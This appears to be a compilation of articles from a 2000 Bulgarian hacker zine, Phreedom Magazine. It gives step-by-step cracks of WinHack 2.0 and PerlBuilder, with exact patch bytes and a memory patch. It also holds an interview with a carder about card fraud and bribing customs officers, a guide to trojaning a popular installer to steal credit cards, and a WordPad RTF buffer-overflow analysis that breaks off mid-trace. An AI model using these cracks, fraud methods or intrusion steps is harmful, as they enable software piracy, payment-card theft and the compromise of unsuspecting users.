|:00472DC7(C), :00472DD9(C)
|
:00472DE9 68F4010000 push 000001F4
* Reference To: kernel32.Sleep, Ord:0000h
|
:00472DEE E84D2EF9FF Call 00405C40
* Referenced by a (U)nconditional or (C)onditional Jump at Address:
|:00472DB1(U)
|
:00472DF3 803D057A4D0000 cmp byte ptr [004D7A05], 00
* Referenced by a (U)nconditional or (C)onditional Jump at Address:
|:00472D93(C)
|
:00472DFA 74B7 je 00472DB3
:00472DFC C605047A4D0000 mov byte ptr [004D7A04], 00
:00472E03 803DFC794D0000 cmp byte ptr [004D79FC], 00
:00472E0A 7407 je 00472E13
:00472E0C 33C0 xor eax, eax
:00472E0E E8850BF9FF call 00403998
* Referenced by a (U)nconditional or (C)onditional Jump at Address:
|:00472E0A(C)
|
:00472E13 33DB xor ebx, ebx
:00472E15 A1F8794D00 mov eax, dword ptr [004D79F8]
:00472E1A 50 push eax
* Reference To: kernel32.CloseHandle, Ord:0000h
|
:00472E1B E8202CF9FF Call 00405A40
:00472E20 8BC3 mov eax, ebx
:00472E22 5E pop esi
:00472E23 5B pop ebx
:00472E24 C3 ret
A vtoroto e :
:00473B70 53 push ebx
:00473B71 80782A01 cmp byte ptr [eax+2A], 01
:00473B75 754F jne 00473BC6
:00473B77 803D187A4D0000 cmp byte ptr [004D7A18], 00
:00473B7E 7546 jne 00473BC6
:00473B80 83051C7A4D0001 add dword ptr [004D7A1C], 00000001
:00473B87 7105 jno 00473B8E
:00473B89 E896F2F8FF call 00402E24
* Referenced by a (U)nconditional or (C)onditional Jump at Address:
|:00473B87(C)
|
:00473B8E 833D1C7A4D0014 cmp dword ptr [004D7A1C], 00000014
:00473B95 7E36 jle 00473BCD
:00473B97 BBDCCC4800 mov ebx, 0048CCDC
:00473B9C E80B080000 call 004743AC
:00473BA1 3B03 cmp eax, dword ptr [ebx]
:00473BA3 7428 je 00473BCD
:00473BA5 C605FC794D0001 mov byte ptr [004D79FC], 01
* Referenced by a (U)nconditional or (C)onditional Jump at Address:
|:00473B38(C)
|
:00473BAC C605057A4D0001 mov byte ptr [004D7A05], 01
:00473BB3 68F4010000 push 000001F4
* Reference To: kernel32.Sleep, Ord:0000h
|
:00473BB8 E88320F9FF Call 00405C40
:00473BBD 33C0 xor eax, eax
:00473BBF E8D4FDF8FF call 00403998
:00473BC4 EB07 jmp 00473BCD
* Referenced by a (U)nconditional or (C)onditional Jump at Addresses:
|:00473B75(C), :00473B7E(C)
|
:00473BC6 33C0 xor eax, eax
:00473BC8 A31C7A4D00 mov dword ptr [004D7A1C], eax
* Referenced by a (U)nconditional or (C)onditional Jump at Addresses:
|:00473B95(C), :00473BA3(C), :00473BC4(U)
|
:00473BCD C605187A4D0000 mov byte ptr [004D7A18], 00
:00473BD4 5B pop ebx
:00473BD5 C3 ret
List-nah tozi code celija ponezhe tuk naistina se krie krasotata na
velikolepnata protection shema na WinHack 2.0 Tova razbrah sled dosta
vreme opiti za debug sus SoftIce. Tazi shema se opira na promjanata na
njakolko adresa: 004D7A04, 004D7A05, 004D7A18, 004D7A1C, 004D79FC ot dve
mesta. I ako njakoj ot adresite ne e setnat kakto trjabva to programata
izliza. Sushto taka mislja che v originala tezi adresi sa skriti ot onzi
TExeImage (tova e predpolozhenie). Fakt e che DeDe ne mi listna koda na dva
unit-a, a trjabvashe. Kato proverih se okaza che v exe-to RVA adresite ne sa
v CODE section-a. No ponezhe znam kak izglezhdat class memberite v Delphi
lesno se orientirah kude zapochvat i zavurshvat dvete procedurki deto se
zanimavat s tozi m.dmp Edva li moga napulno da opisha cjalostnata shema na
zashtitata na tova bebche, no neshto me kara da smjatam che tja e bila
zamislena velikolepno. Krasotata na pisaneto v tezi adresi i cheteneto.
Interesno e che WinHack ne se protivi pri debugvane sus SoftIce, no kogato
se doblizhite do osnovata na reg-code smetkite to bebcheto se halt-va.
Mnogo se chudih za kakvo tochno stava vupros. Bebcheto suchto haltva pri
vseki opit da mu se pishe v pametta - tova razbrah kato se opitah da
napravja memory patch na shrink-natija original.
Sushto taka interesno e che tova bebche se patch-va mnogo lesno. Trjaba
da se zamenjat samo 4 byte-a:
RVA Phys From To
0047574F 00074B4F B8C3 B0FF
00472D9C 0007219C 53 C3
00473B70 00072F70 53 C3
Tuk pod fizicheski adres se ima predvid fizicheskija adres na deshrink-
natija fail (1 038 336 bytes)
E tova e pichove za WinHack 2.0, za tolkova chasa (veche okolo 6) -
tolkova. Sled gornija patch na exe-to mozhe na volja da si debugvate sus
SoftIce i da se naslzhdavete na protection shemata na tova bebche. Interesno
mi e kakuv li e bil originalnija kod na Delphi. Ustanovih che vuv Form1 ima
3 Timer-a. Mozhe bi neshto ot sorta na dvata timera se setvat enabled edin
drug kato nepozvoljavat da vuznikne OnTimer na tretija , setvajki i nego
enabled. A ako tova stane s tretija toj prosto halt-va programata. Tova
razbira se otnovo sa predpolozhenija, no asm coda na tezi timeri e blizuk to
tazi teza.
E veche tova naistina e kraja.
Let the code be with you!
(Bel. Solar: Etimologiqta na tazi fraza e interesna. Tq wodi nachaloto si ot
filma StarWars, kato originalnata i forma e "Let the force be with you!".
Sledowatelno po-prawilno e da se kave "Let the source be with you!", wupreki
che w crackerskite sredi izpozlwaneto na source e rqdkost)
DaFixer
(C) 2000 Phreedom Magazine
]]><![CDATA[
. . . . . . . . . .. . ... . ...............
Cracking PerlBuilder 1.0 By mr-drone
........... . . . . . . . . . . . . . .
Hmm, ne znam kak da zapochna ... moze bi s tova che za men cracking e
dosta shiroko poniatie, no v osnovata si e zaobikaliane na niakakvi nalozeni
ot avtorite ogranichenia - po-malko vreme, po-malko funkcii, po-malko
udobstva. V krajna smetka e vazen krajnia rezultat - pylnocenno polzvane
na crackvanata programa. A po kakyv nachin stava tova - vseki si ima izbor v
metodite :) A kolkoto chovek e na po-prav pyt, tolkova po-malko tochki ima
vyv izrechenieto "I togava debug-vah, debug-vah ..." :) Taka che ne smiatam
che tozi primer e niakakyv etalon, naprotiv , nito pyk neshto revoliucionno
i neshta ot tozi sort - tova e edno myrzelivo reshenie na problema :)
Predpolagam che shte ima dosta hora, koito shte mi se hiliat(osobenno
po-naprednalite v tova izkustvo ;) , no moite propuski mogat da vi podsetiat
se neshto (dano da e taka :) Takaa, maj se oliah s predgovora ...
Zertvata: Perl Builder 1.0d za Win (14-dni evaluation,
www.solutionsoft.com)
Namiram go az edin den PerlBuilder-a i s radost razbiram che shte mi
potriabva. Kakva e iznenadata obache - javno sym go installval predi vreme,
zashtoto se pojaviava edin prozorec i pishe "Trial Expired". Plus tova si
ima i butonche "Quit", "Information" i "Try", koeto obache e sivichko
(disabled).
"Hmm, shte vidim taja rabota" - mislia si az, gledajki log-a na
RegMon-a. Kazano nakratko ne mozah da go hvana dali vyobshte chete ot
registri-to che sa minali kratkite 14 dni. Togava mi hrumna drugo,
po-myrzelivo reshenie na problema. Prosto triabva da se natisne butona "Try"
!!! Izrovih iz disk-a si edna moja programka - 'Enabler' (predpolagam che na
vashia disk ja niama, taka che mozete da si ja drypnete ot
http://mr-drone.hypermart.net, niakyde v 'Own code' ;) i si ja pusnah. Kato
se zadyrzi desnia buton na mishkata vyrhu prozoreca na Enabler-a, toj se
skriva i kursora stava na mishena. Togava chovek moze spokojno da si obhozda
windowskite kontroli (comboboxes, edits, labels, BUTTONS, windows ) i da gi
select-va. Az estestveno si izbrah butona "Try" i pusnah rbutton-a na
mishoka. Enabler-a se pojavi pak, davajki mi slednata informacia za class-a,
parent hwnd-to, i samoto hwnd: Target: "Button, p:0x2CC, h:0x2C4" Target's
text: "&Try" , kakto i che izbrania kontrol e Disabled i Visible. Syvsem
hladnokryvno go napravih da e 'Enabled' i minimizirah Enabler-a da vidia
k'wo stava sys PerlBuilder-a. Butona "Try" beshe veche syvsem normalen i
mozeshe da se clickne, muhahaha :)
Mdaa, ne sled dylgo dojde i razocharovanieto - momchetata ot
SolutionSoft praviat otnovo proverkata dali e izteklo vremeto :( Rezultatyt
beshe edin MessageBox, kazvasht neshto ot sorta : "Your application is
expired!". E, shte triabva po trudnia nachin javno :) Restart-nah mashinata,
za da se zaredi SoftIce. Takaa, pusnah si pak PerlBuilder-a i povtorih
nomera sys Enabler-a. Otbeliazah si toja pyt hwnd-to na button-a "Try" -
"h:0x49C", t.e hwnd-to e 0x48C (genialno, nali :) Predi da natisna "Try"
obache vliazoh s ctrl-d v SoftIce i slozih breakpoint pri message
WM_LBUTTONUP ot hwnd 49C sys komandata 'bmsg 49c wm_lbuttonup'. Izlizajki ot
SoftIce (s ctrl-d) veche biah hvyrlil mrezite i samo triabvashe da natisna
zlopoluchnia buton "Try", za da breakpointna koda. Po babeshkia metod s
golemi skokove pochnah da trasiram koda. Sled 10-toto natiskane na F12 se
pokaza poznatoto syobshtenie svyrzano s expire-vaneto na application-a :)
Mda, znachi sled 9-tia pyt traa da sym po-vnimatelen. Povtorih vsichko ot
nachalo - pusnah pak PerlBuilder-a, sys Enabler-a precakah "Try"-butona,
vidiah mu hwnd-to, izchistih staria breakpoint(bc *) i slozih novia (za
novoto hwnd). Tozi pyt spriah sled 9-toto natiskane na F12 i prodylzih s F10
(step by step). Taka se okaza che 27-moto natiskane na F10 se izpylni samia
call, kojto pokazva MessageBox-a. Povtorih vsichko otnachalo kakto predi, no
tozi pyt vnimavah kato pochana da nablizava zlopoluchnia CALL. Taka stignah
do slednia kod:
157:07005FAA 3B45F0 cmp eax,[ebp-10]
157:07005FAD 751A jnz 07005FC9
157:07005FAF 6A00 push 00
157:07005FB1 8D4DE0 lea ecx,[ebp-20]
157:07005FB4 6A1A push 1A
157:07005FB6 E8B5650100 call 07016570
157:07005FBB 6858330507 push 07053358
157:07005FC0 8D45E0 lea eax,[ebp-20]
157:07005FC3 50 push eax
157:07005FC4 E867A00300 call 07040030
Vesel i shtastliv kato promenih proverkata PerlBuilder-a trygna ! :)
Veche potrivah ryce da patch-na Vboxt403.dll (SoftIce izoblichi nego che
sydyrza gorespomenatia kod), sled koeto ustanovih obache, che v Vboxt403.dll
ne se sydyrza podobna posledovatelnost ot komandi! (0x3B 0x45 0xF0 0x75
0x1A) Mdaa, tuk veche zaciklih kato se chudeh kak da unpack-na dll-a, s
kakvo e pack-nat i vyobshte pack-nat li e ?!? Dokato ne zacepih che toj
vsyshtnost e tochno kakto triabva ... dokato e pusnat PerlBuilder-a :)))
Gnihihi, triabvashe mi malko vreme da si napisha read/write process
memory, i tyj kato znaeh virtualnia adres na kojto se zarezda dll-a ( toest
na men mi triabvashe samo adresa na gornia kod ) mozeh da si go crackna v
pametta :) Vsyshtnost mislia che ne e 100% sigurno che Vboxt403.dll shte se
zaredi tochno na syshtia adres, no tova maj moze da se poluchi samo pri
niakakyv ekstremen sluchaj. Tuk pod 'crackvam v pametta' vsyshtnost imah
predvid slednite deistvia - pusnah si PerlBuilder-a, enable-nah butona
"Try", pusnah si Ps.exe (syshto go ima na mr-drone.hypermart.net) i izbrah
procesa na PerlBuilder-a. Prochetoh vse pak stojnostta na adres 7005FAD za
vseki sluchaj i kato se uverih che e 0x75 (t.e. niama greshka) zapisah 0x74
na syshtia adres :)) Posle samo ostana da natisna "Try" ...
mr-drone
(C) 2000 Phreedom Magazine
]]><![CDATA[
. . . . . . . . . .. . ... . ...............
Interview with a BG carder By EXo
........... . . . . . . . . . . . . . .
Formatut interview e malko netradicionen za Phreedom Magazine, no se
okaza twurde polezen za sluchaq...
Predi izwestno wreme popadnah w IRC na edin chowek, kojto za golqma moq
iznenada se okaza ot po-starite carderi i opredeleno imashe kakwo da
razkave. Sled kratuk krat i edin neuspeshen opit za article ot negowa strana
se ugoworihme da naprawim edno kratko interview. Ne moga da garantiram
100%-owa dostowernost na nestata pisani po-dolu... no sled kato prochetete
materialcheto ste movete da precenite sami. Tiput, estestweno, predpochete
da ostane anonimen.
<Anonymous> Pochwame li ?
<|EXo|> Da, no imaw predwid, che towa "interview" (priemaj go po-skoro
kato chat ili prosto dialog) nqma za cel da te izkara super-geroj da te
chetka i t.n. ... celta mu e informacionna ste se opitam da zadawam
minimalen broj lichni wuprosi chast ot nestata, koito pisha (dori i sega)
ste izleznat, chast ot tqh - ne...
. . .
<|EXo|> Zasto se navi na towa interview... horata, koito se zanimawat s
carding (ili pone tezi, koito durvat na sebe si) rqdko goworqt za
"hitrinite" w zanaqta ?
<Anonymous> az nqmam nikakvo namerenie da komentiram dadeni fakti,
obstoqtelstva prez koito as ili nqkoi drug e minal za da dostigne do
eventualni finansovi oblagi
<|EXo|> Kolko sa spored teb horata w BG, koito mogat da zaqwqt, che
znaqt wsichko za cardinga bez towa da sa prazni dumi ?
<Anonymous> nqkolko momcheta ot Varna, edin zabluden ot Jambol i
ostanaloto sa drebni ribi
<|EXo|> Towa znachi li, che ima nqkolko obosobeni "grupi" carderi w
stranata, koito dejstwat nezawisimo ?
<Anonymous> da, no po opredeleni dosta grubi obstoqtelsva se okaza, che
te si se dyrjat mnogo zdravo, protivno na ochakvaniqta na wsichki v momenta.
Vseki po nqkakyv nachin e zavisim ot drug ...ima i seriozen sluh za proverki
veche btw.
<|EXo|> T.e. wseki move da naklepa ostanalite ako povelae ?
<Anonymous> ami znaesh kak e kydeto ima mnogo pari ima mnogo interesi i
nqma priqteli vseki bi si pokril gyrba dori za smetka na poznat/kolega
<|EXo| >Sluchwalo li se e da se oburkat poruchkite ?
<Anonymous> ako porychka se ozove na SF adres i vytre ima 3 Notebook-a
za okolo $5000 1-2ma hora imat zadyljenieto da pitat nai-golemite ribi chij
sa nestata, w sluchaj, che nikoi ne sa obadi syotvetno Varnenlii sa
pribirali moi raboti i az tehni
<|EXo|> V mail-a, kojto stana prichina za tozi razgowor, ti se
wyzmustawashe ot naroilite se "cardercheta", koito se hwalqt sus "smeshnite"
si poruchki. koe za teb e seriozna poruchka ?
<Anonymous> mnogo truden vypros pri uslovie che 1) moga da se prozwuchi,
kato che se hvalq s otgovora 2) moga da stana smeshen pred nqkoi hora 3)
veroqtno shte vi...izlyja stava duma za prekaleno mnogo pari, zashtoto
obshtata praktika e mnogo po malko
<|EXo|> Togawa, koj e naj-wpechatlqwastiqt order, za kojto znaesh ti ?
<Anonymous> predi dosta vreme se vpechatlih mnogo ot order na varnenlii
s 10x Qantum 6.4Gb + 2x USRobotics EXT. 56.6 + Diamond kyv beshe tam za
obshto okolo $2000 sega se pipa dosta po zdravo inache ne si zaslujava i
riska i nai-veche vremeto koeto otdelqsh, zashtoto tova e intelektualna
izmama v nai-seriozniq vid kogato q pravqt "serioznite carderi"
<|EXo|> Predi kolko wreme naprawi purwiq si "golqm udar" i kak stana
towa ?
<Anonymous> pyrvoto zapoznavane na provincialist ot Varna s mitnichar e
predi okolo 3 god...az malko sled tqh. Za syjalenie samo s mitnichar ne e
izgodno da rabotish, ama tova e druga tema
<|EXo|> W sluchaq, te li potursiha mitnicharite ili mitnicharite gi
potursiha za tezi wzaimni uslugi ?
<Anonymous> pochti vinagi te te izbirat sled kato ne vednyj sa
nabludavali, che daden adres prosto se otlichava s porychkite si
<|EXo|> Kakwa beshe ugoworkata ? kak razdelqhte ... ?
<Anonymous> pyrvonachalno as plashtah 20%. legalnoto mito pri vnos koeto
trqbva da platish e 26% samo che tova mito ne vaji za comp. chasti i vaji
samo nad opredelena suma koqto se ukriva
<|EXo|> Kolko wreme produlvihte taka ?
<Anonymous> mnogo malko, zashtoto mnogo sa gladni onez i vzeha da si
predlagat uslugite nqkolko choveka ...dokato nakraq ediniqt blesna :) s
nai-dobra oferta...
<|EXo|> imashe li natisk ot tqhna strana ? iznudwane ili nesto podobno ?
<Anonymous> ne, daje gi precakvah mnogo chesto v parite primerno: imam
porychka za 1000$. az imam da davam spored dogovorkata 10-15% davam 170lv i
kazvam: "nqma poveche "batence"
<|EXo|> Sega gordeesh li se s towa ?
<Anonymous> tova spored mene e izcqlo vypros na vyzpitanie as sym se
samovyzpitaval ot mnogo malyk => solidno kolichestvo pari ot ne fizicheska
rabota. V tova, che imam intelekta da go pravq, spored mene nqma nishto
stranno
<|EXo|> Imashe li momenti w kojto se nadprewarwahte koj ste porucha
naj-mnogo ?
<Anonymous> ami ne, to tova si e kato konkurenciq mejdu golemi hora,
koito ne raboti nqma da qde
<|EXo|> Dokoga smqtash da produlvawash s poruchkite ?
<Anonymous> dokato se iznesa ot Bulgaria, koeto nadqvam se shte stane
mnogo skoro iskam da zapochna nanovo tam, no kato comp. specialist, a ne
hitrec i tarikat
<|EXo|> Imal li si nqkoga problemi s kukite...i wyobste strah li te e ?
<Anonymous> as lichno ne sym imal, no edin poznat imashe super seriozni
problemi. Chesno kazano "dreme mi na chuchrkata", makar che sa parili hora
i naskoro razbrah za kolega, kojto e ql boi sa mu pribrali pari i stoka.
Kato cqlo oshte ne e izlqzyl zakon, koito da osyjda tozi vid finansovi
oblagi, koito spored mene sa si chista proba intelektualni izmami
<|EXo|> koj praweshe poruchkite ? ti sam li reshawashe kakwo ste wiknesh
"tozi put" ili mashe gotow spisuk sys stoki ?
<Anonymous> za da si zaslujava edna porychka, t.e. golqma e, se vlaga
mnogo moshenicheski potenciql pri kontakta sys sales managera na magazina,
koito prashta stokata nai-dobre se plasira SDRAM, CPU ili Notebook shtoto
pyrvite 2 sa sys 7 dena garanciq, ujasno malko sa, t.e. sybirat se po mnogo
v edna porychka
<|EXo|> Pritesnqwash li se, che s towa interview movesh da nawredish na
nqkoj "kolega" i towa da ne mu se haresa ?
<Anonymous> ami edva li, 1) anonimous sym 2) na kogo mu dreme k'vo
kazvam 3) ne sym citiral konkretno gafove, postypki i t.n. na kolegi pyk i
ne mi puka ot nikoi i ot nishto specqlno na mene. Az ne si vadq samo s tui
hlqba a i nai-mnogo da go e qd nqkoj, che ne se e izpraskal toi s malko
reklama kakto imat navika da pravqt Varnenlii iz razni komersianli
spisaniica (Egoist'12.1999)
<|EXo|> Wsystnost, kakwo mislish za VHG ? kakwi sa ti otnosheniqta s tqh
?
<Anonymous> ami tova e mnogo bolna temq. Ot VHG se poznavam lichno s
edin chovek, koito e dqwolski kydyren, a ot IRC se znam s 2ri koito za mene
e nai-talantliviqt hacker v Bulgaria, ne sluchaino i chlen na !ADM Pod VHG
razbiram xdm, CuMeoHoB, Maniac, schMATKA i daje mai Rumen. da kajem che po
tozi vypros po opredeleni syobrajeniq nqma da byda detailen, no s edna chast
ot VHG ne se poznavam, a s drugi se vijdame chesto :)
<|EXo|> Kak se poluchi problemyt, kojto grumna wuw vestnicite predi
nqkolko godini ?
<Anonymous> ami za nego imam informaciq ot strashno mnogo iztochnici.
Fakt e obache, che v tazi afera ot koqto duhaha Varnenlii, gorkite nqmaha
pryst vina
<|EXo|> Nqkoj si izmi rucete ? kolko nagore stiga cqlata afera ?
<Anonymous> chuh che dori ima zabyrkani politici /za nai-negramotnite -
govori se za aferata s kolata/
<|EXo|> Sled kato prochetat tozi razgowor, sigurno mnogo "hitreci i
tarikati" ste se wturnat da poruchwat, a po-nahalnite move-bi ste se opitat
da wleznat w kontakt i s "dobrite hora" ot mitnicata. Kakwo bi im kazal,
kato chowek, kojto e weche wutre w igrata ?
<Anonymous> zakysnqhte pichove! skytaite se nqkyde, shtoto veche trqbva
da ima sankcii, a te nqma da bydat poneseni ot Varnenlii ili mene, a ot
nqkoi koito ne mu e tolkova debela gushata oshte
<|EXo|> Izvestna li ti e nqkoq carderka ? :)
<Anonymous> seriozni - garantiram, che nqma. Za po nqkoi sutien ot
viktoriasecrets.com (ili kakto beshe tam) + "fishing Efnet all the day" -
moje naistina i momiche da se spravi :)
EXo
(C) 2000 Phreedom Magazine
]]><![CDATA[
. . . . . . . . . .. . ... . ...............
Solar Eclipse's Guide To Stealing 100000 Credit Cards in 21 Days
........... . . . . . . . . . . . . . .
Day 1. Find a victim. There are lots of companies offering direct
download of their software.Some of them have a HUGE user base. A site with
shareware will be better, because more people will download the files. ICQ
will be one of the best victims - they have a lot of downloads every day and
their software will be downloaded mostly by clueless users.
Day 2. Do some security research. Most of big software companies have
fairly good protection for their development servers. But their weak point
are the web servers. Often the system administrators think that isolating
the web server from the rest of the internal network (aka Intranet) will be
good for the overall site security. Sometimes they leave the web server less
protected than the rest of their network. Breaking into the web server is
much easier than breaking into the development servers. Fortunately for the
hackers, everything they need is on the web server.
Day 3. r00t the web server. Clean the logs, install a backdoor, have
fun.
Day 4. Download the latest ICQ version from the web server. You will
attach your trojan code to it.
Day 5. Write your trojan code and attach it to the executable ICQ file.
You might want to use some InstallShield unpacker to get the ICQ.EXE file,
infect it and than put it back into the packed SETUP.EXE. You don't need the
source code of ICQ to put a trojan in it. There are many ways to add
executable code to existing binary files. Viruses have been doing this for
years.
Day 6. Upload the infected ICQ setup file to the server, replacing the
old one. Questions to the sysadmins: How many of you are running Tripwire on
your web server files?
Day 7. Wait
Day 8. Check your email account and see how many new CCs you've got. (I
assume that you are using email for getting the CCs back to you. More
advanced ways to do this exist, but I'll keep it simple and stupid)
Day 9. - Day 20. Buy stuff.
Day 21. Get busted and spend the rest of your life giving pleasure to
big sweaty inmates. But hey, you might like it!
Appendix A. Where are the CCs stored?
There are 3 different approaches to getting the CCs from the user's
computer. You can try scanning the whole hard drive for strings that look
like credit card numbers. There is a simple algorithm for checking if a
given string of digits is a credit card or not. Consult your favorite CCgen
program. This way is slow and the chances of success are not very high.
You can also try putting the user's network card in promiscuous mode, or
capture the outgoing data from his modem. Unfortunately (or fortunately,
depending on your point of view) almost everybody uses SSL nowadays and the
number of unencrypted CCs floating around is not very high.
The third way is to target a specific application. A good example is
Microsoft Wallet. You might need to deal with the encryption of the stored
CC data - it's not impossible, but quite hard. Btw, think about Internet
Explorer. The vast majority of Windows users use IE for online shopping.
Somewhere in MSIE there is a function that takes some parameters as its
input and combines them into a URI encoded string, just like the thing that
you see in your browser's location field after submitting a GET form. This
function is called every time you submit a form and its parameters are the
names and the values of the form input fields. A logical approach for the
browser designers is to use this function for every form (both SSL and
non-SSL) and to encrypt the data in the transport layer, just before passing
them to the Winsock. If you know exactly where this function is located, you
might be able to patch the DLL and make it pass the _unencrypted_ contents
of every submitted form to you. It is possible to find this function through
a lot of debugging and disassembling of MSIE Unfortunately, you will need to
do the same with every version of MSIE, because the exact address of the
code changes.
Probably best approach is to do keyboard capture. Relatively few people
use software like Microsoft Wallet. Most of them enter their CC number every
time they buy something online. This is not only the most successful method,
but also the simplest.
Good luck and don't get caught!
Solar Eclipse
(C) 2000 Phreedom Magazine
]]><![CDATA[
. . . . . . . . . .. . ... . ...............
Microsoft Wordpad Buffer Overflow Research By Solar Eclipse
........... . . . . . . . . . . . . . .
I. Introduction
The first report was from Pauli Ojanpera <pauli_ojanpera@HOTMAIL.COM>
Win98/NT4 Riched20.dll (which WordPad uses) has a classic buffer
overflow problem with ".rtf"-files.
Crashme.rtf :
{\rtf\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA}
A malicious document may probably abuse this to execute arbitary
code. WordPad crashes with EIP=41414141.
Thomas Dullien <dullien@GMX.DE> did a very good research on this
buffer overflow. Unfortunately I received his vuln-dev post after I
was deep into the Wordpad code, so I have already discovered most of the
details that he posted.
II. Research
Ok, let's try to exploit this shit. First, try to crash Wordpad.
Create the following file:
{\rtf\AAAAAAAAAA(100 'A's)}
I am using SoftIce to inspect the situation after the crash.
First, take a look at the registers and the stack.
EIP=61616161
ESP=0012F044
EBP=61616161
ebp eip
0023:0012F024 0012F104 00000102 61616161 61616161 ........aaaaaaaa
0023:0012F034 0000001B 00000246 0012F044 00000023 ....F...D...#...
0023:0012F044 61616161 61616161 61616161 61616161 aaaaaaaaaaaaaaaa
0023:0012F054 61616161 61616161 61616161 61616161 aaaaaaaaaaaaaaaa
0023:0012F064 61616161 61616161 61616161 61616161 aaaaaaaaaaaaaaaa
0023:0012F074 61616161 61616161 00000000 00000000 aaaaaaaa........
We can assume that EBP and EIP were popped from the stack and then RET 10
was executed, decreasing the stack pointer.
To check if this is the case, try the following:
{\rtf\AAAABBBBCCCCDDDDEEEEFFFF(...to ZZZZ)}
Wordpad crashes again. The regiters and the stack are as follows:
ESP=0012F054
EBP=6A6A6A6A 'jjjj'
EIP=6B6B6B6B 'kkkk'
ebp eip
0023:0012F034 0012F114 00000102 6a6a6a6a 6b6b6b6b ........jjjjkkkk
0023:0012F044 0000001B 00000246 0012F054 00000023 ....F...D...#...
0023:0012F054 6C6C6C6C 6D6D6D6D 6E6E6E6E 6F6F6F6F llllmmmmnnnnoooo
0023:0012F064 70707070 71717171 72727272 73737373 ppppqqqqrrrrssss
0023:0012F074 74747474 75757575 76767676 77777777 ttttuuuuvvvvwwww
0023:0012F084 78787878 79797979 7A7A7A7A 00000200 xxxxyyyyzzzz....
Yes, our assumption was correct. EBP gets its value from 0012F03C, and the
RET 10 instruction gets the EIP from 0012F040.
The buffer is probably 36 characters big, because 'jjjj' overwrites it.
By the way, notice that the characters are lowercased. This means that the
buffer is lowercased before the crash.
Let's try the following file (36 characters):
{\rtf\AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIII}
It shouldn't crash, but it does. This is strange. Take a look at the
registers and the stack: (btw, do a quick check with 35 characters - Wordpad
will not crash)
EIP=002E0033
ESP=0012F108
EBP=00200067
0023:0012F0E8 0012F294 6E002F02 00200067 002E0033 ...../.ng. .3...
0023:0012F0F8 0000001B 00000202 0012F108 00000023 ............#...
0023:0012F108 0020002E 006C0070 00610065 00650073 .. .p.l.e.a.s.e.
0023:0012F118 00770020 00690061 00000074 00000000 .w.a.i.t.......
0023:0012F128 00000000 00000000 0000002E 00000000 ................
0023:0012F138 0012F194 5F816876 00000014 00000000 ....vh._........
0023:0012F148 00000000 00000001 029AE0CD 00000064 ............d...
0023:0012F158 0012F1B8 0012F68C 0012F638 5F816850 ........8...Ph._
0023:0012F168 00C14812 00000000 0012F2A4 00000168 .H..........h...
0023:0012F178 0012F292 0012F290 00C15810 0012F1A8 .........X......
0023:0012F188 00C15B3A 00000007 00000006 0012F1CC :[..............
0023:0012F198 6C026878 0012F294 0012F290 00C11DC8 xh.l............
0023:0012F1A8 61616161 62626262 63636363 64646464 aaaabbbbccccdddd
0023:0012F1B8 65656565 66666666 67676767 68686868 eeeeffffgggghhhh
0023:0012F1C8 7D696969 0012F1E0 6C026B81 0012F290 iii}.....k.l....
This is even more strange. The EBP and EIP are not overwritten by our
string, but they are still smashed.
It's time to try to find where exactly is the code, guilty for this mess.
Notice that the EIP is overwritten and we don't know what code was executed
before the crash. Pauli Ojanpera posted that the crash was in riched20.dll.
Check the loaded DLL-s: there is no riched20.dll, but we see riched32.dll.
This sounds good! At what address is this DLL loaded?
:map32 riched32
Owner Obj Name Obj# Address Size Type
RICHED32 .text 0001 001B:6C001000 00027284 CODE RO
The code is loaded at 6C001000. Where is the buffer overflow? It is probably
located in some function in RICHED32.DLL. This function is probably called
from some other function, which is also called from somewhere. We should
be able to see the return addresses for these previous calls on the stack.
Let's search for something that looks like a return address. At 0012F1D0 we
see the bytes 6C026B81. This looks like an address in RICHED32.DLL, doesn't
it? Go diassemble the bastard!
It is part of a function, starting at 6C026B0B and ending at 6C026B68
(I have incuded some more code in the middle, more about it later)
001B:6C026B0B push ebp
001B:6C026B0C mov ebp, esp
001B:6C026B0E sub esp, 04
...
001B:6C026B7A mox ecx, esi
001B:6C026B7C call 6C0267D1 ; this is called for each \ tag
001B:6C026B81 mov [edi], eax
...
001B:6C026B64 pop edi
001B:6C026B65 pop esi
001B:6C026B66 mov esp, ebp
001B:6C026B68 ret
Put a breakpoint in the beginning of this function and see what happens.
The 6C026B0B function is called 2 times and crashes the second time.
Trace it step by step, stepping over the calls. The function crashes
after the final RET instruction (located at 6C026B68)
Just before the crash the stack lools like this:
edi esi local_var old_ebp
0023:0012F1D4 0012F290 00C13D58 5CC15A30 0012F40C
0023:0012F1E4 6C024DE0 <- ret address
The POP EDI and POP ESI instructions restore these two registers (look at
the disassembly). Then the function restores the ESP (which is saved in EBP
in the beginning of the function). By trying this with a normal RTF file
(not causing a buffer overflow), we see that ESP becomes 0012F1E0. Then EBP
is popped from the stack (it becomes 0012F40C) and the RET instruction
returnes the execution flow to 6C024DE0.
This is not the case with a fucked up RTF file. Everything is ok until we
hit the MOV ESP, EBP instruction. The value in the EBP register is not
correct, thus fucking up the ESP and causing a mess.
Ok, now we need to find where in the 6C026B0B function the EBP is smashed.
Put a breakpoint in the beginning of the function and trace it (without
stepping into the calls). The EBP in the beginning of the function is
0012F1E0. It changes after the CALL 6C0267D1 instrcution.
Now we have the function that changes the EBP.
001B:6C0267D1 push ebp
001B:6C0267D2 mov ebp, esp
001B:6C0267D4 sub esp, 24
...
The stack of this function looks like this:
0023:0012F1A8 61616161 62626262 63636363 64646464 aaaabbbbccccdddd
0023:0012F1B8 65656565 66666666 67676767 68686868 eeeeffffgggghhhh
0023:0012F1C8 7D696969 0012F1E0 6C026B81 0012F290 iii}.....k.l....
ebp eip
At 0012F1D4 we have the return address. The EBP is saved at 0012F1D0 and
then the stack pointer is decremented by 36, leaving space for 36 bytes of
local variables. Remember this number? This is our buffer!
After some more tracing, we see that the saved ebp is changed because of
001B:6C0268E9 mov byte ptr [ebx], 00
executed right after the buffer is filled with our characters. This
is a NULL termination of the string, which changes the saved ebp
from 0012F1D0 to 0012F100.
Let's do some more reverse engineering. From 6C0268AE to 6C0268DB we have
a loop that reads our string and copies it into the buffer.
001B:6C0268AE mov al, [ecx] ; get the current char
001B:6C0268B0 inc ecx ; ecx points to the next char
001B:6C0268B1 mov [ebp-01], al ; store the current char at 0012F1C8
001B:6C0268B4 mov [esi+1C], ecx ; store ecx at 0012F2AC
001B:6C0268B7 mov eax, 00000001 ; what the fuck?
001B:6C0268BC test eax, eax
